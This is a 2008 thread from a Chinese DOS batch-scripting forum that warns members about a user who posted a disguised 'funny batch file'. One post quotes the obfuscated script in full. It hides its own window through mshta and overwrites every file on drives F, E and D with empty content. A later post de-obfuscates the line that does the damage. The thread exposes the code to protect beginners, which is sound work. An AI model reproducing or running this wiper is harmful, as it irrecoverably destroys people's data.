中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net 论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

中国DOS联盟论坛
现在时间是 2026-06-24 13:22
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » 警惕!警惕!ID:maidu 发布危害代码! 查看 3,378 回复 21
16 发表于 2008-04-22 17:03 ·  中国 内蒙古 包头 电信
初级用户
积分 30
发帖 14
注册 2008-03-28 17:06
18年会员
UID 114273
性别 男
状态 离线
同意楼上,虚拟机运行程序比较安全。
17 发表于 2008-04-22 19:08 ·  中国 湖北 武汉 电信
初级用户
积分 108
发帖 49
注册 2008-02-26 18:54
18年会员
UID 111491
性别 男
状态 离线
下载可执行文件时,注意杀毒软件的提示
18 发表于 2008-04-22 19:08 ·  中国 湖北 武汉 电信
初级用户
积分 108
发帖 49
注册 2008-02-26 18:54
18年会员
UID 111491
性别 男
状态 离线
对于象没经过加密的vbs,bat可看其原文件是否含有恶意代码..

[ Last edited by learner0 on 2008-4-22 at 07:11 PM ]
19 发表于 2008-04-23 08:57 ·  中国 福建 泉州 电信
初级用户
★★
积分 112
发帖 81
注册 2008-04-11 23:47
18年会员
UID 115654
性别 男
状态 离线
Originally posted by learner0 at 2008-4-22 07:08 PM:
下载可执行文件时,注意杀毒软件的提示


有些东西杀毒软件也无能为力.ps恶毒行为.
让我们这些初学者受害.

[ Last edited by ktv98 on 2008-4-23 at 09:01 AM ]
20 发表于 2008-04-23 12:18 ·  中国 安徽 芜湖 电信
高级用户
★★
积分 537
发帖 219
注册 2006-10-31 21:08
19年会员
UID 69036
性别 男
来自 芜湖
状态 离线
发帖的目的主要是防止更多的人受害。
因为学习不够的肯定不止我一个,若我不采取动作,相信会有更多的人上当的。
那个"maidu"用的标题是 "搞笑的批处理",大概是说这个批处理是个动画,帖出来的代码内容是个VBS代码,运行后得到一个压缩包,里面有批处理文件。
批处理文件内容:

echo off||▄︻┻═┳一>f e d
::搞怪的批处理
@if %1.=='. call:' %~s0 '&'>&1>%tmp%\%~n0
echo.|set/p x=|echo.|time/t&date/t<nul
echo 按任意键开始演示&pause>nul
goto:'
{:~ """~~~\\auther unknown date 08-04-18//~~~""" ~:}
set/p %2=<%1||(shift&color %1%2&%~s0 %1)
for %%a in (%':~-5%)do %%a:&for /r %%s in (*)do %':~-6,1%%%~ss call %%':~,8%%
{:' """~~~\\thank you to everyone!//~~~""" ':}
if %2.=='. (goto:~) else mshta vbscript:createobject("wscript.shell").run("%~s0 '",0)(window.close)


当我发现情况后,立即发帖揭露"maidu",谁知他竟恶人先告状,把帖子代码编辑成"二楼的家伙把我的代码改成病毒代码了!"

查阅此人另一个帖说的大概内容是,"你们不要小瞧批处理,你们有一天可能因为运行了一个批处理导致所有盘的数据都丢失了,你们自己还不知道呢!只要你们在论坛里混,就逃不出我的这句话!!"


告戒菜鸟们:看不懂的代码再也不要随便运行了!等了你中招就被人鄙视啦!! 什么风凉话都出来了,像什么“受骗是自己学习不够”!!!!
相信大家都有运行过看不懂的代码吧!!!! 但,以后不要了!
江湖远
碧空长
路茫茫

一个人漫无目的的奔跑,风,刺骨的冷....
21 发表于 2008-11-23 21:54 ·  中国 广东 江门 电信
中级用户
★★
积分 338
发帖 175
注册 2007-10-21 15:30
18年会员
UID 100351
性别 男
状态 离线
maidu=卖毒
本帖最近评分记录 (共 2 条) 点击查看详情
评分人分数时间
yishanju -13 2008-11-24 09:32
523066680 +13 2009-02-07 16:27
22 发表于 2009-02-07 00:24 ·  中国 广东 东莞 电信
银牌会员
★★★
批处理编程迷
积分 1,916
发帖 752
注册 2008-12-28 04:30
17年会员
UID 135147
性别 男
来自 广西
状态 离线
毒在这一句哦!:
for %%a in (%':~-5%)do %%a:&for /r %%s in (*)do %':~-6,1%%%~ss call %%':~,8%%

等于:
for %%a in (f e d) do(
%%a:
for /r %%s in (*) do >%%s call echo off
)

依次进入f: e: d:盘,读取所有文件,并写入空。
如此就算用undel也无法恢复!够毒!够毒!!
通常数据都放在这三个盘,剩个系统C:有什么用。
这人的心也太黑了,人人得以诛之!
精简
=> 个人网志
论坛跳转: